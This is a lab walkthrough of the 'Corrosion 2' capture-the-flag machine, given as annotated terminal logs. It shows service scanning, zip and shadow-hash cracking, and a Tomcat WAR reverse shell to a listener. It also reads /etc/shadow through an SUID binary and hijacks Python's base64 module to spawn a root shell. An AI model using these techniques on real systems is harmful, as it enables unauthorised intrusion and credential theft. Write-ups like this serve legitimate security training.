Corrosion 2
Port recognition withnmap
┌──(root@ghost)-[/home/ghost]
└─# nmap --min-rate 5000 -sV corrosion.vuln
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-04 19:39 EST
Nmap scan report for corrosion.vuln (10.0.2.92)
Host is up (0.000062s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
8080/tcp open http Apache Tomcat 9.0.53
MAC Address: 08:00:27:81:64:BF (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.45 seconds
Nmap reports three open ports 22 for ssh, 80 for apache and 8080 for apache tomcat
┌──(root@ghost)-[/home/ghost]
└─# wfuzz -c -t 100 --hc=404 -z file,/usr/share/dirb/wordlists/common.txt http://corrosion.vuln:8080/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://corrosion.vuln:8080/FUZZ
Total requests: 4614
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 198 L 490 W 11136 Ch "http://corrosion.vuln:8080/"
000001319: 302 0 L 0 W 0 Ch "docs"
000001519: 302 0 L 0 W 0 Ch "examples"
000001575: 200 21 L 132 W 21588 Ch "favicon.ico"
000001920: 302 0 L 0 W 0 Ch "host-manager"
000002436: 302 0 L 0 W 0 Ch "manager"
Total time: 3.791455
Processed Requests: 4614
Filtered Requests: 4608
Requests/sec.: 1216.946
┌──(root@ghost)-[/home/ghost]
└─# wfuzz -c -t 100 --hc=404 -z file,/usr/share/dirb/wordlists/common.txt -z list,php-html-txt-bak-zip http://corrosion.vuln:8080/FUZZ.FUZ2Z
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://corrosion.vuln:8080/FUZZ.FUZ2Z
Total requests: 23070
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000002815: 200 120 L 1306 W 32107 Ch "backup - zip"
000016463: 200 2 L 29 W 153 Ch "readme - txt"
Total time: 18.43840
Processed Requests: 23070
Filtered Requests: 23068
Requests/sec.: 1251.192
Fuzzing apache tomcat server
┌──(root@ghost)-[/home/ghost]
└─# curl -s http://corrosion.vuln:8080/backup.zip -o backup.zip
Downloading backup.zip file
┌──(root@ghost)-[/home/ghost]
└─# unzip backup.zip
Archive: backup.zip
[backup.zip] catalina.policy password:
The file is protected with password
┌──(root@ghost)-[/home/ghost]
└─# zip2john backup.zip 2>/dev/null > hash
Converting zip to john hash format
┌──(root@ghost)-[/home/ghost]
└─# john --wordlist=rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
@administrator_hi5 (backup.zip)
1g 0:00:00:01 DONE (2023-03-04 20:04) 0.6756g/s 7761Kp/s 7761Kc/s 7761KC/s @alex123..@aal?~112
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We cracked the password of the zip file
┌──(root@ghost)-[/home/ghost]
└─# unzip backup.zip
Archive: backup.zip
[backup.zip] catalina.policy password:
inflating: catalina.policy
inflating: context.xml
inflating: catalina.properties
inflating: jaspic-providers.xml
inflating: jaspic-providers.xsd
inflating: logging.properties
inflating: server.xml
inflating: tomcat-users.xml
inflating: tomcat-users.xsd
inflating: web.xml
Extracting compressed files
┌──(root@ghost)-[/home/ghost]
└─# grep -r 'username' tomcat-users.xml
you must define such a user - the username and password are arbitrary.
<user username="admin" password="<must-be-changed>" roles="manager-gui"/>
<user username="robot" password="<must-be-changed>" roles="manager-script"/>
<user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
<user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
<user username="role1" password="<must-be-changed>" roles="role1"/>
<user username="manager" password="melehifokivai" roles="manager-gui"/>
<user username="admin" password="melehifokivai" roles="admin-gui, manager-gui"/>
Credentials found in tomcat-users.xml file, login http://corrosion.vuln:8080/manager/ as admin:melehifokivai
┌──(root@ghost)-[/home/ghost]
└─# bash shellstorm.sh war 10.0.2.15 1337
added manifest
adding: payload.jsp(in = 1496) (out= 582)(deflated 61%)
adding: WEB-INF/(in = 0) (out= 0)(stored 0%)
adding: WEB-INF/web.xml(in = 258) (out= 182)(deflated 29%)
[+] war file compiled in /tmp/war/payload.war
Generating WAR file with ShellStorm
┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
listening on [any] 1337 ...
connect to [10.0.2.15] from corrosion.vuln [10.0.2.92] 35650
tomcat@corrosion:/var/spool/cron$
After browse our war file, click on deploy tab. Then with our netcat listener set visit http://corrosion.vuln:8080/payload/ to get the reverse shell
tomcat@corrosion:/home/randy$ cat user.txt
ca73a018ae6908a7d0ea5d1c269ba4b6
Here the user flag
tomcat@corrosion:/home/randy$ ls /home
jaye randy
tomcat@corrosion:/home/randy$ su jaye
su jaye
Password: melehifokivai
$ script /dev/null -c bash
Script started, file is /dev/null
jaye@corrosion:/home/randy$
Reusing password to pivot between user accounts
jaye@corrosion:/home/randy$ find / -perm -u=s 2>/dev/null
...
/home/jaye/Files/look
...
jaye@corrosion:/home/randy$ ls -la /home/jaye/Files/look
---s--s--x 1 root root 14728 Sep 17 2021 /home/jaye/Files/look
This program can read files as root privileged
jaye@corrosion:/home/randy$ /home/jaye/Files/look '' /etc/shadow
root:$6$fHvHhNo5DWsYxgt0$.3upyGTbu9RjpoCkHfW.1F9mq5dxjwcqeZl0KnwEr0vXXzi7Tld2lAeYeIio/9BFPjUCyaBeLgVH1yK.5OR57.:18888:0:99999:7:::
daemon:*:18858:0:99999:7:::
bin:*:18858:0:99999:7:::
sys:*:18858:0:99999:7:::
sync:*:18858:0:99999:7:::
games:*:18858:0:99999:7:::
man:*:18858:0:99999:7:::
lp:*:18858:0:99999:7:::
mail:*:18858:0:99999:7:::
news:*:18858:0:99999:7:::
uucp:*:18858:0:99999:7:::
proxy:*:18858:0:99999:7:::
backup:*:18858:0:99999:7:::
list:*:18858:0:99999:7:::
irc:*:18858:0:99999:7:::
gnats:*:18858:0:99999:7:::
nobody:*:18858:0:99999:7:::
systemd-network:*:18858:0:99999:7:::
systemd-resolve:*:18858:0:99999:7:::
systemd-timesync:*:18858:0:99999:7:::
messagebus:*:18858:0:99999:7:::
syslog:*:18858:0:99999:7:::
_apt:*:18858:0:99999:7:::
tss:*:18858:0:99999:7:::
uuidd:*:18858:0:99999:7:::
tcpdump:*:18858:0:99999:7:::
avahi-autoipd:*:18858:0:99999:7:::
usbmux:*:18858:0:99999:7:::
rtkit:*:18858:0:99999:7:::
dnsmasq:*:18858:0:99999:7:::
cups-pk-helper:*:18858:0:99999:7:::
speech-dispatcher:!:18858:0:99999:7:::
avahi:*:18858:0:99999:7:::
kernoops:*:18858:0:99999:7:::
saned:*:18858:0:99999:7:::
nm-openvpn:*:18858:0:99999:7:::
hplip:*:18858:0:99999:7:::
whoopsie:*:18858:0:99999:7:::
colord:*:18858:0:99999:7:::
geoclue:*:18858:0:99999:7:::
pulse:*:18858:0:99999:7:::
gnome-initial-setup:*:18858:0:99999:7:::
gdm:*:18858:0:99999:7:::
sssd:*:18858:0:99999:7:::
randy:$6$bQ8rY/73PoUA4lFX$i/aKxdkuh5hF8D78k50BZ4eInDWklwQgmmpakv/gsuzTodngjB340R1wXQ8qWhY2cyMwi.61HJ36qXGvFHJGY/:18888:0:99999:7:::
systemd-coredump:!!:18886::::::
tomcat:$6$XD2Bs.tL01.5OT2b$.uXUR3ysfujHGaz1YKj1l9XUOMhHcKDPXYLTexsWbDWqIO9ML40CQZPI04ebbYzVNBFmgv3Mpd3.8znPfrBNC1:18888:0:99999:7:::
sshd:*:18887:0:99999:7:::
jaye:$6$Chqrqtd4U/B1J3gV$YjeAWKM.usyi/JxpfwYA6ybW/szqkiI1kerC4/JJNMpDUYKavQbnZeUh4WL/fB/4vrzX0LvKVWu60dq4SOQZB0:18887:0:99999:7:::
Reading /etc/shadow
┌──(root@ghost)-[/home/ghost]
└─# john --wordlist=rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
07051986randy (randy)
1g 0:00:07:02 DONE (2023-03-04 21:05) 0.6060g/s 1666p/s 1666c/s 1666C/s 24brandy..!brandyn!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Cracked randy hash
┌──(root@ghost)-[/home/ghost]
└─# ssh randy@corrosion.vuln
randy@corrosion.vuln's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.11.0-34-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
19 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
randy@corrosion:~$
Connected as randy via ssh
randy@corrosion:~$ sudo -l
[sudo] password for randy:
Matching Defaults entries for randy on corrosion:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User randy may run the following commands on corrosion:
(root) PASSWD: /usr/bin/python3.8 /home/randy/randombase64.py
Randy can execute /usr/bin/python3.8 /home/randy/randombase64.py as root
randy@corrosion:~$ ls -la randombase64.py
-rwxr-xr-x 1 root root 210 Sep 20 2021 randombase64.py
randy@corrosion:~$ cat randombase64.py
import base64
message = input("Enter your string: ")
message_bytes = message.encode('ascii')
base64_bytes = base64.b64encode(message_bytes)
base64_message = base64_bytes.decode('ascii')
print(base64_message)
We can't modify randombase64.py file
randy@corrosion:~$ find / base64 2>/dev/null | grep python | grep base64 | grep -v '/snap'
/usr/lib/python3.8/encodings/base64_codec.py
/usr/lib/python3.8/encodings/__pycache__/base64_codec.cpython-38.pyc
/usr/lib/python3.8/__pycache__/base64.cpython-38.pyc
/usr/lib/python3.8/email/base64mime.py
/usr/lib/python3.8/email/__pycache__/base64mime.cpython-38.pyc
/usr/lib/python3.8/base64.py
randy@corrosion:~$ ls -la /usr/lib/python3.8/base64.py
-rwxrwxrwx 1 root root 20386 Sep 20 2021 /usr/lib/python3.8/base64.py
But how about /usr/lib/python3.8/base64.py has enough permissions for us
randy@corrosion:~$ nano /usr/lib/python3.8/base64.py
#! /usr/bin/python3.8
import os
os.system('/bin/sh')
"""Base16, Base32, Base64 (RFC 3548), Base85 and Ascii85 data encodings"""
# Modified 04-Oct-1995 by Jack Jansen to use binascii module
# Modified 30-Dec-2003 by Barry Warsaw to add full RFC 3548 support
# Modified 22-May-2007 by Guido van Rossum to use bytes everywhere
import re
import struct
import binascii
__all__ = [
# Legacy interface exports traditional RFC 2045 Base64 encodings
'encode', 'decode', 'encodebytes', 'decodebytes',
# Generalized interface for other encodings
...
Just import os module to execute '/bin/sh' should work for this kind of python library hijack
randy@corrosion:~$ sudo -u root /usr/bin/python3.8 /home/randy/randombase64.py
# cat /root/root.txt
2fdbf8d4f894292361d6c72c8e833a4b